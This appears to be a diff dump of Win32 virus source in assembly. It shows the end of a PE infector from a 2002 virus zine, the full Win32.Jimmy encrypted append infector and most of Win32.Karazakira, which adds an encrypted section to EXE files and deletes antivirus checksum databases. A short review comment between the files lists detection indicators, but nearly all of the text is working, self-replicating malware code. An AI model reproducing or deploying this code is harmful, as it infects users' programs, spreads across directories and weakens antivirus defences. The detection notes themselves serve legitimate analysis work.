test [edx][SECTION.Characteristics], IMAGE_SCN_CNT_CODE
jnz @F
lea ecx, [edi][PE.SizeOfInitializedData ]
test [edx][SECTION.Characteristics], IMAGE_SCN_CNT_INITIALIZED_DATA
jnz @F
lea ecx, [edi][PE.SizeOfUninitializedData ]
@@: DO_API AlignToVA, eax, [edi][PE.FileAlignment]
sub [ecx], eax
mov eax, [esi][VX.NewSectionSize ]
add [ecx], eax
; Set the new EntryPoint and save the old one
mov ebx, [esi][VX.VirusEntryPoint ]
push ebx
xchg [edi][PE.AddressOfEntryPoint], ebx
mov [esi][VX.HostsEntryPoint], ebx
pop ebx
; Write the code section of the virus
DO_API ConvertToVA, [MAP], ebx
push esi
mov esi, [esi][VX.DeltaOffset]
lea esi, [esi][WinMain ]
mov edi, eax
mov ecx, Virus_Code / 4
rep movsd
pop esi
; Write the data section of the virus
push esi
mov ecx, Size VX / 4
rep movsd
pop esi
; Do the checksums, one of which is pointing to a junk area
pop ebx
DO_API tCheckSumMappedFile PTR [esi][VX.pCheckSumMappedFile], [MAP], [esi][VX.NewFileSize], ADDR [esi][VX.SectionEntry], ADDR [ebx][PE.CheckSum]
FinishExit:
ret
FinishFile ENDP
; =============================================================================
; ( Align to Boundary ) =======================================================
; =============================================================================
AlignToVA PROC VALUE:DWORD, ALIGNER:DWORD
; EDX:EAX = VALUE. Divide by ECX, subtract remainder and add ALIGNER.
mov eax, [VALUE ]
xor edx, edx
mov ecx, [ALIGNER]
div ecx
or edx, edx
mov eax, [VALUE ]
jz AlignExit
add eax, [ALIGNER]
AlignExit:
sub eax, edx
ret
AlignToVA ENDP
; =============================================================================
; ( Convert RVA to VA ) =======================================================
; =============================================================================
ConvertToVA PROC MAP:DWORD, VALUE:DWORD
mov esi, [MAP ]
mov edi, [VALUE]
or edi, edi
jz ConvertFail
; Locate start of SECTION in MAP, prepare for looping through them all
add esi, [esi][IMAGE_DOS_HEADER.e_lfanew]
movzx ecx, [esi][PE.NumberOfSections ]
add si, [esi][PE.SizeOfOptionalHeader ]
adc esi, PE.Magic
ConvertLoop:
; Jump over this section entry if it starts above our RVA
cmp [esi][SECTION.VirtualAddress], edi
ja ConvertNext
; To find out where the section ends in the file, we need to check the
; SizeOfRawData and VirtualSize entries and use the biggest one. Know
; now that TASM and MASM swap the meanings of these entries. Bitches.
mov eax, [esi][SECTION.SizeOfRawData ]
cmp eax, [esi][SECTION.VirtualSize ]
ja @F
mov eax, [esi][SECTION.VirtualSize ]
@@: add eax, [esi][SECTION.VirtualAddress]
; Jump over this section entry if it ends below our RVA
cmp eax, edi
jbe ConvertNext
; Fail if this entry doesn't exist in the file [could be memory only]
cmp [esi][SECTION.PointerToRawData], 0
je ConvertFail
; Convert raw pointer to VA and add our value's pointers offset to it
mov eax, [MAP]
add eax, [esi][SECTION.PointerToRawData]
sub edi, [esi][SECTION.VirtualAddress ]
add eax, edi
jmp ConvertExit
ConvertNext:
add esi, SIZE SECTION
loop ConvertLoop
ConvertFail:
xor eax, eax
ConvertExit:
ret
ConvertToVA ENDP
; =============================================================================
; ( Alternate SfcIsFileProtected ) ============================================
; =============================================================================
AlternSfc PROC A:DWORD, B:DWORD
; Alternate SfcIsFileProtected procedure, returns "File Unprotected"
mov eax, FALSE
ret
AlternSfc ENDP
; =============================================================================
; ( Alternate CheckSumMappedFile ) ============================================
; =============================================================================
AlternSum PROC A:DWORD, B:DWORD, Y:DWORD, Z:DWORD
; Alternate CheckSumMappedFile procedure, returns "NULL Checksum OK"
mov eax, [Z]
mov ebx, NULL
xchg [eax], ebx
mov eax, [Y]
mov [eax], ebx
mov eax, [A]
add eax, [eax][IMAGE_DOS_HEADER.e_lfanew]
ret
AlternSum ENDP
; =============================================================================
; ( Virus Data ) ==============================================================
; =============================================================================
ALIGN 4
Virus_Code EQU $ - WinMain
Virus_Data VX { }
Virus_Size EQU $ - WinMain
Virus ENDS
END WinMain
COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=-
-=( ---------------------------------------------------------------------- ) `
+820
@@ -0,0 +1,820 @@
; Win32.Jimmy by SST@Hablas.com
;
; Infektion bei Win95/98/ME, WinNt4.0, WinNT2000
; Variable Xor Encryption
; Append Infector
;
; Yes, this is my first W32.Virus
.586p
.model flat
jumps
.radix 16
extrn ExitProcess:PROC
.data
Data:
filemask db '*.Exe',0
FileHandle dd 0h
NewSize dd 0h
AlignReg1 dd 0h
InfCounter dd 0h
APICRC32 dd 0h
Trash2 dd 0h
DirectoryBuffer db 255d dup (0h)
KernelMZ dd 0h
OTableVA dd 0h
MapHandle dd 0h
OldDirectory db 255d dup (0h)
K32Trys dd 0h
counter dw 0h
AlignReg2 dd 0h
APINames:
dd 0FE248274h
dd 08C892DDFh
dd 0EBC6C18Bh
dd 0B2DBD7DCh
dd 0613FD7BAh
dd 0AE17EBEFh
dd 096B2D96Ch
dd 0AA700106h
dd 094524B42h
dd 0797B49ECh
dd 0C200BE21h
dd 068624A9Dh
ATableVA dd 0h
TempApisearch2 dd 0h
APIOffsets:
XGetWindowsDirectoryA dd 0h
XCreateFileA dd 0h
XGetCurrentDirectoryA dd 0h
XSetCurrentDirectoryA dd 0h
XGetTickCount dd 0h
XFindFirstFileA dd 0h
XCreateFileMappingA dd 0h
XFindNextFileA dd 0h
XUnmapViewOfFile dd 0h
XMapViewOfFile dd 0h
XFindClose dd 0h
XCloseHandle dd 0h
TempAPI dd 0h
KernelPE dd 0h
RandVal dd 0h
FindHandle dd 0h
OldEIP dd 0h
NewEIP dd 0h
MapAddress dd 0h
alte dd 0h
NTableVA dd 0h
Trash1 dd 0h
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
groese equ (offset EndVirus - offset Virus )
NumberOfApis equ 12
encrypted = ( ( offset endofcrypt - offset encgo ) / 2 ) + 1
.code
VirusCode:
Virus:
call Delta
dw 15662d
dw 31058d
codeofcrypt dw 0h
Delta:
mov edx, dword ptr [esp]
inc esp
add esp, 3d
sub edx, ( offset Delta - 6)
mov ebp, edx
mov edi, ebp
or edi, edi
jz encgo
mov edx, encrypted
lea ecx, [ebp+encgo]
encgoloop:
xor bx, word ptr [ebp+codeofcrypt]
mov word ptr [ecx], bx
add ecx, 2
dec edx
jnz encgoloop
encgo:
jmp KernelSearchStart
NoKernel:
mov ebx, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], ebx
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi
mov dword ptr [ebp+Trash2], edi
mov edi, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], edi
ExecuteHost:
cmp ebp, 0
je FirstGenHost
mov ebx,12345678h
org $-4
retEIP dd 0h
add ebx,12345678h
org $-4
retBase dd 0h
push ebx
ret
FirstGenHost:
sub ebx, ebx
push ebx
call ExitProcess
InfectEXE:
call GetRand
mov ebx, dword ptr [ebp+RandVal]
mov word ptr [ebp+codeofcrypt], bx
mov ecx, -49695d
add ecx, 49695d
add ecx, dword ptr [ebp+MapAddress]
mov eax, [ecx+3Ch]
add eax, ecx
add eax, 3Ch
mov edx, [eax]
sub eax, 3Ch
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
mov dword ptr [ebp+AlignReg2], -1
and dword ptr [ebp+AlignReg2], edx
sbb eax, 2d
add ecx, groese
mov dword ptr [ebp+AlignReg1], 0
xor dword ptr [ebp+AlignReg1], ecx
call Align
and ecx, 0
add ecx, dword ptr [ebp+AlignReg1]
mov dword ptr [ebp+NewSize], ecx
pushad
Call UnMapFile2
popad
mov dword ptr [ebp+WFD_nFileSizeLow], ecx
call CreateMap
jc NoEXE
push dword ptr [ebp+MapAddress]
pop esi
mov edx, dword ptr [esi+3Ch]
add edx, esi
push edx
pop esi
mov ebx,0
mov bx, word ptr [esi+06h]
mov ecx, 1d
sub ebx, ecx
imul ebx, ebx, 28h
add edx, 120d
add edx, ebx
mov eax, dword ptr [esi+74h]
shl eax, 3
add edx, eax
mov eax, dword ptr [esi+28h]
mov dword ptr [ebp+OldEIP], eax
mov ecx, dword ptr [esi+34h]
push ecx
pop dword ptr [ebp+alte]
push 0
pop ecx
add ecx, [edx+10h]
push ecx
pop ebx
add edx, 14h
add ecx, [edx]
sub edx, 14h
push ecx
push ebx
pop eax
add eax, [edx+0Ch]
mov [esi+28h], eax
mov dword ptr [ebp+NewEIP], eax
sub eax, eax
add eax, [edx+10h]
push eax
add eax, groese
push eax
pop dword ptr [ebp+AlignReg1]
push dword ptr [esi+3Ch]
pop dword ptr [ebp+AlignReg2]
call Align
sub eax, eax
add eax, dword ptr [ebp+AlignReg1]
mov dword ptr [edx+10h], 0h
add dword ptr [edx+10h], eax
pop eax
add eax, groese
mov dword ptr [edx+08h], 0
add dword ptr [edx+08h], eax
mov eax, dword ptr [edx+0Ch]
add eax, dword ptr [edx+10h]
mov dword ptr [esi+50h], 0h
add dword ptr [esi+50h], eax
or dword ptr [edx+24h], 0A0000020h
mov dword ptr [esi+4Ch], 'Jimm'
pop edi
add edi, dword ptr [ebp+MapAddress]
mov ecx, ( offset encgo - offset Virus )
lea esi, [ebp+Virus]
AppendLoop:
rep movsb
push encrypted
pop ecx
CryptAppendLoop:
lodsw
xor ax, word ptr [ebp+codeofcrypt]
stosw
sub ecx, 1
jnz CryptAppendLoop
mov edx, ( -1d xor 27d )
xor edx, 27d
and edx, dword ptr [ebp+InfCounter]
sub edx, 1d
rol eax, 16d
push edx
pop dword ptr [ebp+InfCounter]
clc
ret
NoEXE:
stc
ret
InfectFile:
cmp dword ptr [ebp+WFD_nFileSizeLow], 44000d
jbe NoInfection
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection
call OpenFile
jc NoInfection
mov eax, dword ptr [ebp+MapAddress]
cmp word ptr [eax], 'ZM'
je Goodfile
push 28785d
pop ecx
cmp ecx, 28785d
je Notagoodfile
Goodfile:
cmp word ptr [eax+3Ch], 0h
jne _Notagoodfile
jmp Notagoodfile
_Notagoodfile:
xor ebx, ebx
add ebx, [eax+3Ch]
cmp dword ptr [ebp+WFD_nFileSizeLow],ebx
jb Notagoodfile
add ebx, eax
cmp word ptr [ebx], 'EP'
je Goodfile2
push 24945d
pop ecx
cmp ecx, 24945d
je Notagoodfile
Goodfile2:
cmp dword ptr [ebx+4Ch], 'Jimm'
jz Notagoodfile
mov cx, word ptr [ebx+16h]
rcl edx, 12d
and cx, 0F000h
cmp cx, 02000h
je Notagoodfile
mov cx, word ptr [ebx+16h]
and cx, 00002h
cmp cx, 00002h
jne Notagoodfile
call InfectEXE
jc NoInfection
and edx, ebx
Notagoodfile:
call UnMapFile
NoInfection:
ret
Outbreak:
mov esi, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], esi
mov ebx, dword ptr [ebp+alte]
mov dword ptr [ebp+retBase], ebx
call InfectCurDir
mov eax, ebp
add eax, offset OldDirectory
push eax
mov eax, ( 255d xor 32d )
xor eax, 32d
push eax
call dword ptr [ebp+XGetCurrentDirectoryA]
lea edx, [ebp+OldDirectory]
mov ebx, edx
TravelDownLoop1:
inc edx
cmp byte ptr [edx], 0
jne TravelDownLoop1
TravelDownLoop2:
add edx, -1d
cmp byte ptr [edx], '\'
jne TravelDownNext
mov byte ptr [edx], 0
push ebx
call dword ptr [ebp+XSetCurrentDirectoryA]
pushad
call InfectCurDir
popad
mov byte ptr [edx], '\'
TravelDownNext:
cmp edx, ebx
jne TravelDownLoop2
mov eax, ( 255d + 16d )
sub eax, 16d
push eax
lea ecx, [ebp+DirectoryBuffer]
push ecx
call dword ptr [ebp+XGetWindowsDirectoryA]
xchg ecx, edx
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]
call InfectCurDir
lea edx, [ebp+OldDirectory]
push edx
call dword ptr [ebp+XSetCurrentDirectoryA]
jmp ExecuteHost
GetApis:
push NumberOfApis
pop eax
mov esi, 37168d
sub esi, 37168d
add esi, dword ptr [ebp+KernelPE]
mov edi, [esi+78h]
add edi, [ebp+KernelMZ]
add edi, 28d
mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+ATableVA], esi
inc edi
add edi, 3d
mov esi, dword ptr [edi]
add edi, 4d
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+NTableVA], esi
mov esi, dword ptr [edi]
add esi, [ebp+KernelMZ]
mov dword ptr [ebp+OTableVA], esi
lea ecx, [ebp+APINames]
mov esi, ebp
add esi, offset APIOffsets
GetApisLoop:
and word ptr [ebp+counter], 0h
inc ecx
add ecx, 3d
xor edx, edx
add edx, dword ptr [ebp+TempAPI]
mov dword ptr [esi], edx
inc esi
add esi, 3d
dec eax
jnz GetApisLoop
jmp Outbreak
CRC32:
pushad
mov edi, -28264d
add edi, 28264d
add edi, esi
push 0
pop ebx
add ebx, edi
LenCRC:
sub ebx, -1d
cmp byte ptr [ebx], 0
jne LenCRC
sub ebx, edi
mov esi, ebx
add esi, 1d
cld
mov eax, 16859d
sub eax, 16859d
dec eax
sub eax, 0d
mov edx, eax
NextByteCRC:
mov ebx, -6128d
add ebx, 6128d
sub ecx, ecx
mov bl, byte ptr [edi]
inc edi
xor bl, al
mov al, ah
mov ah, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr cx, 1
rcr bx, 1
jnc NoCRC
xor bx,08320h
xor cx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor eax, ebx
xor edx, ecx
dec esi
jnz NextByteCRC
not edx
not eax
mov ebx, edx
rol ebx, 16d
mov bx, ax
mov dword ptr [ebp+APICRC32], ebx
popad
ret
SearchAPI1:
pushad
push 0
pop ebx
add ebx, dword ptr [ebp+NTableVA]
and dword ptr [ebp+Trash1], ebx
sar edx, 10d
SearchNextApi1:
push ebx
mov eax, dword ptr [ebx]
add eax, [ebp+KernelMZ]
push eax
pop ebx
push ebx
pop esi
push esi
pop dword ptr [ebp+TempApisearch2]
push ecx
cld
call CRC32
mov eax, 52825d
sub eax, 52825d
add eax, dword ptr [ebp+APICRC32]
sub eax, dword ptr [ecx]
cmp eax, 0
je FoundApi1
ApiNotFound:
pop ecx
mov esi,0
add esi, dword ptr [ebp+TempApisearch2]
pop ebx
inc ebx
add ebx, 3d
add word ptr [ebp+counter], 1h
cmp word ptr [ebp+counter], 2002h
je NotFoundApi1
jmp SearchNextApi1
FoundApi1:
add esp, 8d
xor edx, edx
mov dx, word ptr [ebp+counter]
clc
rcl edx, 1
add edx, dword ptr [ebp+OTableVA]
push edx
pop ebx
movzx edx, word ptr [ebx]
clc
rcl edx, 2h
add edx, dword ptr [ebp+ATableVA]
mov ebx, dword ptr [ebp+KernelMZ]
add ebx, dword ptr [edx]
mov dword ptr [ebp+TempAPI], -1
and dword ptr [ebp+TempAPI], ebx
cmp byte ptr [ebx], 0cch
je ExecuteHost
popad
ret
NotFoundApi1:
pop esi
popad
jmp ExecuteHost
FindNextFileProc:
call ClearOldData
mov edx, ebp
add edx, offset WIN32_FIND_DATA
push edx
mov ebx, dword ptr [ebp+FindHandle]
push ebx
call dword ptr [ebp+XFindNextFileA]
ret
ClearOldData:
pushad
push 276d
pop eax
lea edx, [ebp+WFD_szFileName]
ClearOldData2:
mov byte ptr [edx], 0h
dec eax
jnz ClearOldData2
popad
ret
FindFirstFileProc:
call ClearOldData
lea edx, [ebp+WIN32_FIND_DATA]
push edx
push ebx
call dword ptr [ebp+XFindFirstFileA]
push eax
pop dword ptr [ebp+FindHandle]
ret
Align:
pushad
mov edx,0
mov eax, dword ptr [ebp+AlignReg1]
mov ecx, dword ptr [ebp+AlignReg2]
div ecx
inc eax
mul ecx
mov dword ptr [ebp+AlignReg1], 0h
add dword ptr [ebp+AlignReg1], eax
popad
ret
db 'Win32.Jimmy - SST@Hablas.com',0
OpenFile:
push 0
push 0
push 3
push 0
push 1
mov ebx, 80000000h or 40000000h
push ebx
lea ebx, WFD_szFileName
add ebx, ebp
push ebx
sal ecx, 28d
call dword ptr [ebp+XCreateFileA]
add eax, 1
jz Closed
dec eax
mov dword ptr [ebp+FileHandle], eax
CreateMap:
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
push ecx
and edx, 0
push edx
add ebx, eax
push ecx
push edx
push 00000004h
push edx
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]
mov dword ptr [ebp+MapHandle], -1
and dword ptr [ebp+MapHandle], eax
pop ecx
or eax, eax
jz CloseFile
push 0
pop edx
push ecx
push edx
push edx
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]
test eax, eax
jz UnMapFile
mov dword ptr [ebp+MapAddress], -1
and dword ptr [ebp+MapAddress], eax
clc
ret
UnMapFile:
Call UnMapFile2
CloseFile:
push dword ptr [ebp+FileHandle]
Call [ebp+XCloseHandle]
Closed:
stc
ret
UnMapFile2:
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XUnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XCloseHandle]
ret
InfectCurDir:
mov [ebp+InfCounter], 2d
mov ebx, offset filemask
add ebx, ebp
call FindFirstFileProc
inc eax
jz EndInfectCurDir
InfectCurDirFile:
call InfectFile
sub ecx, ecx
add ecx, dword ptr [ebp+InfCounter]
inc ecx
dec ecx
jz EndInfectCurDir
call FindNextFileProc
cmp eax, 0h
jne InfectCurDirFile
EndInfectCurDir:
push dword ptr [ebp+FindHandle]
call dword ptr [ebp+XFindClose]
ret
KernelSearchStart:
mov eax, dword ptr [esp]
shr eax, 16d
rol eax, 16d
mov dword ptr [ebp+K32Trys], 4h
GK1:
mov edx, -1d
and edx, dword ptr [ebp+K32Trys]
or edx, edx
jz NoKernel
cmp word ptr [eax], 'ZM'
je CheckPE
GK2:
mov ebx, ( 65536d + 32d )
sub ebx, 32d
sub eax, ebx
dec dword ptr [ebp+K32Trys]
jmp GK1
CheckPE:
mov edx, [eax+3Ch]
xchg edx, eax
add eax, edx
xchg edx, eax
movzx ebx, word ptr [edx]
sub ebx, 'EP'
jz CheckDLL
jmp GK2
CheckDLL:
KernelFound:
mov dword ptr [ebp+KernelMZ], -1
not ecx
and dword ptr [ebp+KernelMZ], eax
mov dword ptr [ebp+KernelPE], edx
lea eax, [ebp+offset GetApis]
push eax
ret
GetRand:
pushad
add edx, dword ptr [ebp+RandVal]
call dword ptr [ebp+XGetTickCount]
add edx, eax
mov dword ptr [ebp+RandVal], 0
add dword ptr [ebp+RandVal], edx
popad
ret
endofcrypt:
EndVirus:
end VirusCode
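Review bot: The file is added without any analysis notes, and the static artifacts its infection routine leaves behind deserve a header comment so the sample is usable for detection work. In `InfectEXE` the dword at PE+4Ch (the reserved Win32VersionValue field, zero in a well-formed PE) is overwritten with `'Jimm'` and `InfectFile` reads that same field back as its already-infected test, the last section's characteristics are OR'd with `0A0000020h` (code, execute, write), and AddressOfEntryPoint at PE+28h is moved into that section. The 16-bit XOR key at `codeofcrypt` is refreshed from GetTickCount per infection, but the bytes from `Virus` to `encgo` are copied in clear text in `AppendLoop`, so that decryptor prefix is stable apart from the two key bytes. Suggested header: `; Indicators: Win32VersionValue (PE+4Ch) = 'Jimm'; last section chars |= 0A0000020h; EP relocated into last section; clear-text decryptor Virus..encgo`.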
+567
@@ -0,0 +1,567 @@
; _ __ ____ __ ___ __ _ _ ____ __
; | |/\ / \ | _ \ / \ / _ \ / \ | |/\ | | | _ \ / \
; | _/ | || | | / | || | |// / | || | | _/ | | | / | || |
; | \ | | | |\ \ | | / /|\ | | | \ | | | |\ \ | |
; |_|\/ |_||_| |_||_| |_||_| /____/ |_||_| |_|\/ |_| |_||_| |_||_|
; By Psychologic/rRlf
;
; Kara-Intro :
;
; This is my 3rd win32asm virus, I named it as an Indian's ring "KARAZAKIRA"
; which belived can call a soul from the deathman (a man who has been die)
; well, I think this is unique name.
; Workz :
;
; When Karazakira file executed, Karazakira searches for 4 PE *.EXE files in the current
; and windows directory. Those files will be infected by adding a new section called
; ".Karazakira" (called in infect section as ptr [edi], "raK.").
; File modification works by direct access, not by memory mapping (Bad idea right..??)
; well it just for different touch, hehe :P
; Feature :
;
; * full Win32 compatible
; * encrypted using DIV algorithm
; * Infecting windows directory
; * Deleting some AV checksum files
; Compile :
;
; tasm32 /mx /m karazakira.asm
; tlink32 /Tpe /aa karazakira.obj,,, import32.lib
; ====================================================================================
; ====================================================================================
;
; ====================================================================================
; ====================================================================================
length_virus_file EQU (end_static - start)
length_virus_mem EQU (end_mem - start)
length_encrypted EQU (end_encrypted - encrypted)
length_PE_header EQU 1000
Extrn MessageBoxA:Proc
Extrn ExitProcess:Proc
.386p
.model flat
.data
start:
pushad
pushfd
db 0BDh
delta_offset dd 0
lea esi, [ebp+offset encrypted]
mov edi, esi
mov ecx, length_encrypted / 8
db 0BBh
crypt_key dd 0
rush_code:
copyright db "Win32.Karazakira By Psychologic", 0
db "On Friday, second January '05 - Depok City, Indonesia", 0
GetProcAddress db "GetProcAddress", 0
l_GPA = $ - offset GetProcAddress
FindFirstFileA db "FindFirstFileA", 0
FindNextFileA db "FindNextFileA", 0
FindClose db "FindClose", 0
CreateFileA db "CreateFileA", 0
CloseHandle db "CloseHandle", 0
ReadFile db "ReadFile", 0
WriteFile db "WriteFile", 0
DeleteFileA db "DeleteFileA", 0
SetFilePointer db "SetFilePointer", 0
SetFileAttributesA db "SetFileAttributesA", 0
SetFileTime db "SetFileTime", 0
SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
GetSystemDirectoryA db "GetSystemDirectoryA", 0
GetTickCount db "GetTickCount", 0
anti_vir_dat db "ANTI-VIR.DAT", 0
chklist_ms db "CHKLIST.MS", 0
chklist_cps db "CHKLIST.CPS", 0
avp_crc db "AVP.CRC", 0
orig_eip dd offset quit_1st_gen
filemask db "*.EXE", 0
new_section_header:
db ".Karazakira", 0, 0
VirtualSize dd length_virus_mem
VirtualAddress dd 0
PhysicalSize dd length_virus_file
PhysicalAddress dd 0
dd 0, 0, 0
dd 0E0000020h
if ((($-encrypted) mod 8) NE 0)
db (8-(($-encrypted) mod 8)) dup(0)
endif
decrypt:
lodsd
xchg eax, edx
lodsd
cmp edx, ebx
JA no_mul
push ebx
push edx
mul ebx
pop ebx
add eax, ebx
adc edx, 0
pop ebx
stosd
xchg eax, edx
stosd
LOOP decrypt
JMP encrypted
no_mul:
stosd
xchg eax, edx
stosd
LOOP decrypt
encrypted:
mov eax, [ebp+offset orig_eip]
mov [ebp+offset host_entry], eax
push offset seh_handler
push dword ptr fs:[0]
mov fs:[0], esp
mov eax, [esp+11*4]
scan_kernel:
cmp word ptr [eax], "ZM"
JNE kernel_not_found
mov ebx, [eax+3Ch]
add ebx, eax
cmp dword ptr [ebx], "EP"
JE kernel32_found
kernel_not_found:
dec eax
JMP scan_kernel
kernel32_found:
mov [ebp+offset kernel32], eax
mov ebx, [ebx+120]
add ebx, eax
mov edx, [ebx+20h]
add edx, eax
mov ecx, [ebx+18h]
GPA_search:
push ecx
mov esi, [edx]
add esi, eax
lea edi, [ebp+offset GetProcAddress]
mov ecx, l_GPA
cld
rep cmpsb
pop ecx
JE GPA_found
inc edx
inc edx
inc edx
inc edx
LOOP GPA_search
GPA_not_found:
JMP return_to_host
GPA_found:
mov edx, [ebx+18h]
sub edx, ecx
shl edx, 1
add edx, [ebx+24h]
add edx, eax
xor ecx, ecx
mov cx, [edx]
shl ecx, 2
add ecx, [ebx+1Ch]
add ecx, eax
mov ebx, [ecx]
add ebx, eax
mov [ebp+offset GPA_addr], ebx
lea eax, [ebp+offset curdir]
push eax
push 260
lea eax, [ebp+offset GetCurrentDirectoryA]
call call_API
push 260
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset GetWindowsDirectoryA]
call call_API
lea eax, [ebp+offset windir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
lea eax, [ebp+offset curdir]
push eax
lea eax, [ebp+offset SetCurrentDirectoryA]
call call_API
call infect_dir
return_to_host:
pop dword ptr fs:[0]
pop eax
popfd
popad
db 068h
host_entry dd 0
ret
seh_handler:
mov esp, [esp+8]
JMP return_to_host
infect_dir:
mov dword ptr [ebp+infectioncount], 4
lea eax, [ebp+offset anti_vir_dat]
call kill_file
lea eax, [ebp+offset chklist_ms]
call kill_file
lea eax, [ebp+offset chklist_cps]
call kill_file
lea eax, [ebp+offset avp_crc]
call kill_file
lea eax, [ebp+offset find_data]
push eax
lea eax, [ebp+offset filemask]
push eax
lea eax, [ebp+offset FindFirstFileA]
call call_API
mov [ebp+offset search_handle], eax
inc eax
JZ end_infect_dir
infect:
push 80h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
push 0
push 80h
push 3
push 0
push 0
push 0C0000000h
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset CreateFileA]
call call_API
mov [ebp+offset file_handle], eax
inc eax
JZ restore_attributes
push 0
lea eax, [ebp+offset bytes_read]
push eax
push 64
lea eax, [ebp+offset dos_header]
push eax
push [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp word ptr [ebp+offset exe_marker], "ZM"
JNE close
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset ReadFile]
call call_API
cmp dword ptr [ebp+offset pe_marker], "EP"
JNE close
test word ptr [ebp+offset flags], 0010000000000000b
JNZ close
lea ebx, [ebp+offset optional_header]
add bx, word ptr [ebp+offset SizeOfOptHeader]
xor eax, eax
mov ax, word ptr [ebp+offset NumberOfSections]
dec eax
mov ecx, 40
mul ecx
add eax, ebx
mov edi, eax
cmp dword ptr [edi], "raK."
JE close
mov eax, [ebp+offset EntryPoint]
add eax, [ebp+offset ImageBase]
mov [ebp+offset orig_eip], eax
inc word ptr [ebp+offset NumberOfSections]
mov eax, [edi+12]
add eax, [edi+8]
mov ebx, [ebp+offset SectionAlign]
call align_EAX
mov [ebp+offset VirtualAddress], eax
mov [ebp+offset EntryPoint], eax
add eax, [ebp+offset ImageBase]
sub eax, offset start
mov [ebp+offset delta_offset], eax
mov eax, length_virus_mem
call align_EAX
add dword ptr [ebp+offset SizeOfImage], EAX
mov eax, [edi+20]
add eax, [edi+16]
mov ebx, [ebp+offset FileAlign]
call align_EAX
mov [ebp+offset PhysicalAddress], eax
push 0
push 0
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
mov eax, length_virus_file
call align_EAX
mov [ebp+PhysicalSize], eax
mov ecx, 40
lea esi, [ebp+offset new_section_header]
add edi, ecx
cld
pusha
xor eax, eax
repe scasb
popa
JNE close
rep movsb
push eax
lea eax, [ebp+offset GetTickCount]
call call_API
mov ebx, eax
ror eax, 8
xor ebx, eax
mov [ebp+offset crypt_key], ebx
lea esi, [ebp+offset start]
lea edi, [ebp+offset crypt_buffer]
mov ecx, length_virus_file
rep movsb
lea esi, [ebp+offset crypt_buffer+(encrypted-start)]
mov edi, esi
mov cx, length_encrypted / 8
encrypt:
lodsd
xchg eax, edx
lodsd
xchg eax, edx
cmp edx, ebx
JA no_div
div ebx
no_div:
xchg eax, edx
stosd
xchg eax, edx
stosd
loop encrypt
pop eax
push 0
lea ecx, [ebp+offset bytes_read]
push ecx
push eax
lea eax, [ebp+offset crypt_buffer]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
push 0
push 0
push dword ptr [ebp+offset new_header]
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFilePointer]
call call_API
push 0
lea eax, [ebp+offset bytes_read]
push eax
push length_pe_header
lea eax, [ebp+offset pe_header]
push eax
push dword ptr [ebp+file_handle]
lea eax, [ebp+offset WriteFile]
call call_API
dec dword ptr [ebp+infectioncount]
close:
lea eax, [ebp+offset LastWriteTime]
push eax
lea eax, [ebp+offset LastAccessTime]
push eax
lea eax, [ebp+offset CreationTime]
push eax
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset SetFileTime]
call call_API
push dword ptr [ebp+offset file_handle]
lea eax, [ebp+offset CloseHandle]
call call_API
restore_attributes:
push dword ptr [ebp+offset FileAttributes]
lea eax, [ebp+offset FileName]
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
find_next:
mov ecx, [ebp+infectioncount]
JCXZ close_find
lea eax, [ebp+offset find_data]
push eax
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindNextFileA]
call call_API
dec eax
JZ infect
close_find:
push dword ptr [ebp+offset search_handle]
lea eax, [ebp+offset FindClose]
call call_API
end_infect_dir:
ret
kill_file:
push eax
push 80h
push eax
lea eax, [ebp+offset SetFileAttributesA]
call call_API
lea eax, [ebp+offset DeleteFileA]
call call_API
RET
call_API:
push eax
push dword ptr [ebp+offset kernel32]
call [ebp+offset GPA_addr]
JMP eax
align_EAX:
xor edx, edx
div ebx
or edx, edx
JZ no_round_up
inc eax
